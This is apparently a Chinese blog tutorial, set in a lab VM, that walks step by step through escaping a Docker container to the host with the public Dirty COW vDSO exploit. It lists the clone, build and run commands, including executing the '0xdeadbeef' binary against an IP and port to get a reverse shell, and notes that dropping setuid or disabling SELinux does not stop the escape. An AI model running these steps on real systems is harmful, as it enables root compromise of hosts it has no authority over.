发表于 2018-07-20 | 分类于 hack | 阅读数
测试环境虚拟机:ubuntu14.04,安装docker
1、安装docker:1
apt-get install docker.io
具体安装可见官方文档:https://docs.docker.com/install/linux/docker-ce/ubuntu/
2、在docker中pull一个ubuntu:14.041
docker pull ubuntu:14.04docker images
看看已有容器
3、 接下来我们创建一个守护态的Docker容器,然后使用docker attach命令进入该容器。1
docker run -itd ubuntu:14.04 /bin/bash
4、然后我们使用docker ps查看到该容器CONTAINER ID信息,接下来就使用docker attach进入该容器1
docker attach CONTAINER ID
5、安装编译软件,下载exp1
2
3
4
5
6apt-get install -y build-essential
apt-get install -y nasm
apt-get install -y git
git clone https://github.com/scumjr/dirtycow-vdso
make
ifconfig
make完后在目录多出一个0xdeadbeef,执行命令:
./0xdeadbeef docker的IP:端口
等一会然后发现终端没输出了,在里面输入命令会有回显
对比IP地址,上图为宿主,下图为docker容器
6、提权原理可以看
https://bbs.pediy.com/thread-220057.htm
https://blog.csdn.net/enjoy5512/article/details/53196047
7、用下面2中方式启动容器依然可以1
2docker run --cap-drop setuid -itd zangniu:1 /bin/bash
docker --selinux-enabled=false run -itd zangniu:1 /bin/bash